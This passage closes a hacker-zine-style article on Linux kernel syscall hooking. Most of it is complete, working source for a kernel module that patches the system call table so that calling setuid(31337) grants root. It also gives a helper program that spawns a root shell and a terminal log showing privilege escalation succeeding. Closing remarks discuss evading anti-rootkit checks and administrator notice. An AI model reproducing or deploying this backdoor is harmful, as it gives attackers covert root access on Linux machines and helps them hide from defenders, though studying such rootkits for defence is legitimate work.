    return commit_creds(cred);


    I strongly advice you to use kernel's git for understanding the kernel changes.
    (http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=tags)


--file: hook_setuid.c--
#include <linux/module.h>
#include <linux/version.h>
#include <linux/vmalloc.h>
#include <linux/mm.h>
#include <linux/sched.h>
#include <asm/unistd.h>

#ifdef CONFIG_IA32_EMULATION
#include "unistd_32.h"
#endif


#ifdef __i386__
struct idt_descriptor {
    unsigned short offset_low;
    unsigned short selector;
    unsigned char zero;
    unsigned char type_flags;
    unsigned short offset_high;
} __attribute__ ((packed));
#elif defined(CONFIG_IA32_EMULATION)
struct idt_descriptor {
    unsigned short offset_low;
    unsigned short selector;
    unsigned char zero1;
    unsigned char type_flags;
    unsigned short offset_middle;
    unsigned int offset_high;
    unsigned int zero2;
} __attribute__ ((packed));
#endif

struct idtr {
    unsigned short limit;
    void *base;
} __attribute__ ((packed));


void **sys_call_table;
#ifdef CONFIG_IA32_EMULATION
void **ia32_sys_call_table;
#endif


asmlinkage long (*real_setuid)(uid_t uid);

asmlinkage long hooked_setuid(uid_t uid) {
    if (uid == 31337) {
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,29)
        struct cred *cred = prepare_creds();
        cred->uid = cred->suid = cred->euid = cred->fsuid = 0;
        cred->gid = cred->sgid = cred->egid = cred->fsgid = 0;
        return commit_creds(cred);
#else
        current->uid = current->euid = current->suid = current->fsuid = 0;
        current->gid = current->egid = current->sgid = current->fsgid = 0;
        return 0;
#endif
    }
    return real_setuid(uid);
}


#if defined(__i386__) || defined(CONFIG_IA32_EMULATION)
#ifdef __i386__
void *get_sys_call_table(void) {
#elif defined(__x86_64__)
void *get_ia32_sys_call_table(void) {
#endif
    struct idtr idtr;
    struct idt_descriptor idtd;
    void *system_call;
    unsigned char *ptr;
    int i;

    asm volatile("sidt %0" : "=m"(idtr));

    memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));

#ifdef __i386__
    system_call = (void*)((idtd.offset_high<<16) | idtd.offset_low);
#elif defined(__x86_64__)
    system_call = (void*)(((long)idtd.offset_high<<32) |
                        (idtd.offset_middle<<16) | idtd.offset_low);
#endif

    for (ptr=system_call, i=0; i<500; i++) {
#ifdef __i386__
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0x85)
            return *((void**)(ptr+3));
#elif defined(__x86_64__)
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
            return (void*) (0xffffffff00000000 | *((unsigned int*)(ptr+3)));
#endif
        ptr++;
    }

    return NULL;
}
#endif


#ifdef __x86_64__
#define IA32_LSTAR  0xc0000082

void *get_sys_call_table(void) {
    void *system_call;
    unsigned char *ptr;
    int i, low, high;

    asm volatile("rdmsr" : "=a" (low), "=d" (high) : "c" (IA32_LSTAR));

    system_call = (void*)(((long)high<<32) | low);

    for (ptr=system_call, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
            return (void*)(0xffffffff00000000 | *((unsigned int*)(ptr+3)));
        ptr++;
    }   

    return NULL;
}
#endif


void *get_writable_sct(void *sct_addr) {
    struct page *p[2];
    void *sct;
    unsigned long addr = (unsigned long)sct_addr & PAGE_MASK;

    if (sct_addr == NULL)
        return NULL;

#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,22) && defined(__x86_64__)
    p[0] = pfn_to_page(__pa_symbol(addr) >> PAGE_SHIFT);
    p[1] = pfn_to_page(__pa_symbol(addr + PAGE_SIZE) >> PAGE_SHIFT);
#else
    p[0] = virt_to_page(addr);
    p[1] = virt_to_page(addr + PAGE_SIZE);
#endif
    sct = vmap(p, 2, VM_MAP, PAGE_KERNEL);
    if (sct == NULL)
        return NULL;
    return sct + offset_in_page(sct_addr);
}

static int __init hook_init(void) {
    sys_call_table = get_writable_sct(get_sys_call_table());
    if (sys_call_table == NULL)
        return -1;

#ifdef CONFIG_IA32_EMULATION
    ia32_sys_call_table = get_writable_sct(get_ia32_sys_call_table());
    if (ia32_sys_call_table == NULL) {
        vunmap((void*)((unsigned long)sys_call_table & PAGE_MASK));
        return -1;
    }
#endif

    /* hook setuid */
#ifdef __NR_setuid32
    real_setuid = sys_call_table[__NR_setuid32];
    sys_call_table[__NR_setuid32] = hooked_setuid;
#else
    real_setuid = sys_call_table[__NR_setuid];
    sys_call_table[__NR_setuid] = hooked_setuid;
#endif
#ifdef CONFIG_IA32_EMULATION
#ifdef __NR32_setuid32
    ia32_sys_call_table[__NR32_setuid32] = hooked_setuid;
#else
    ia32_sys_call_table[__NR32_setuid] = hooked_setuid;
#endif
#endif
    /***************/

    return 0;
}

static void __exit hook_exit(void) {
    /* unhook setuid */
#ifdef __NR_setuid32
    sys_call_table[__NR_setuid32] = real_setuid;
#else
    sys_call_table[__NR_setuid] = real_setuid;
#endif
#ifdef CONFIG_IA32_EMULATION
#ifdef __NR32_setuid32
    ia32_sys_call_table[__NR32_setuid32] = real_setuid;
#else
    ia32_sys_call_table[__NR32_setuid] = real_setuid;
#endif
#endif
    /*****************/

    // unmap memory
    vunmap((void*)((unsigned long)sys_call_table & PAGE_MASK));
#ifdef CONFIG_IA32_EMULATION
    vunmap((void*)((unsigned long)ia32_sys_call_table & PAGE_MASK));
#endif
}

module_init(hook_init);
module_exit(hook_exit);
MODULE_LICENSE("GPL");
--EOF--


--file: get_root.c--
#include <unistd.h>

int main() {
    if (setuid(31337) == -1) {
        perror("setuid");
        return 1;
    }
    execlp("bash", "bash", NULL);
}
--EOF--


    oblique@gentoo ~/hooking $ ./configure.sh 
    oblique@gentoo ~/hooking $ make
    make -C /lib/modules/2.6.34-zen1/build M=/home/oblique/hooking modules
    make[1]: Entering directory `/usr/src/linux-2.6.34-zen1-r2'
      CC [M]  /home/oblique/hooking/hook_setuid.o
      Building modules, stage 2.
      MODPOST 1 modules
      CC      /home/oblique/hooking/hook_setuid.mod.o
      LD [M]  /home/oblique/hooking/hook_setuid.ko
    make[1]: Leaving directory `/usr/src/linux-2.6.34-zen1-r2'
    oblique@gentoo ~/hooking $ sudo insmod hook_setuid.ko  
    oblique@gentoo ~/hooking $ gcc get_root.c -o get_root
    oblique@gentoo ~/hooking $ ./get_root 
    gentoo hooking # id
    uid=0(root) gid=0(root) groups=0(root)
    gentoo hooking # rmmod hook_setuid
    gentoo hooking # exit
    exit
    oblique@gentoo ~/hooking $ ./get_root 
    setuid: Operation not permitted
    oblique@gentoo ~/hooking $ 

    
--[ 0x0B Other ideas/methods
    
    What we saw, was one of the most basic hooking techniques. There are
    lots of equivalent techniques: for example, to avoid editing the
    sys_call_table, we can just allocate a buffer in kernel memory and copy
    the sys_call_table there. Then we change the addresses in the new array
    and finally we change the address called by the system_call. If we
    want, we can change the intrerrupt's 0x80 value from IDT, or the value
    of IA32_LSTAR MSR, pointing to another system_call. One other elegant
    hooking method, independent from system calls, is hooking the
    debugger's trap. This can be implemented using the interrupt 3 from
    IDT.

    This technique has some limitations. It cannot be applied in systems
    which have the LKM support disabled. Modules *must* be compiled for the
    same kernel they are going to be loaded from, which means that with a
    kernel update, module needs to be re-compiled. Solutions for these
    issues are provided by some userland-based techniques which can change
    the kernel memory through /dev/mem or /dev/kmem, but in this case other
    forms of protection need to be faced.

    Notice: Anti-rootkits usually check the sys_call_table, so the method
    shown here should not be used. Maybe some workaround is to change
    sys_call_table's address inside system_call, or implement our own
    system_call. Moreover with lsmod or through /proc/kallsyms, a sys-admin
    should be able to notice that something goes wrong...but hooking can
    solve all these issues.


    I hope you enjoyed reading the article as much as I enjoyed writing it :)


    Happy hacking,
    oblique.


--[ 0x0C Greets

    Greets to grhack.net community, AthCon staff and p0wnbox.Team. Special
    thanks to slasher, huku, sin, Hack_ThE_PaRaDiSe, krumel, smack for
    their knowledge and their company. Thanks pytt, angel_scar and
    killer_null for being good friends. Last but not least I want to give
    kudos to my friends from the real world, psychedelic music and FF.C for
    their songs and philosophy.


--[ 0x0D References

    [1] http://phrack.org/issues.html?issue=59&id=4#article
    [2] http://phrack.org/issues.html?issue=58&id=7#article
    [3] http://wiki.osdev.org/IDT#IDT_in_IA-32e_Mode_.2864-bit_IDT.29
    [5] Linux Kernel source code (http://kernel.org)
    [6] KSplice source code (http://www.ksplice.com/software)

    Intel 64 and IA-32 Architectures Software Developer's Manual
    (http://www.intel.com/products/processor/manuals/):
    [7] "Volume 3A: System Programming Guide", Sections: 5.8.7 - 5.9, 9.4
    [8] "Volume 3B: System Programming Guide", Appendix B
    [9] "Volume 2B: Instruction Set Reference, N-Z", Section: 4.2,
        Instructions: RDMSR, WRMSR, SYSCALL

                                                        _______________________________|_._._._._._,
                                                        \                       EOF    |_X_X_X_X_X_|
                                                                                       !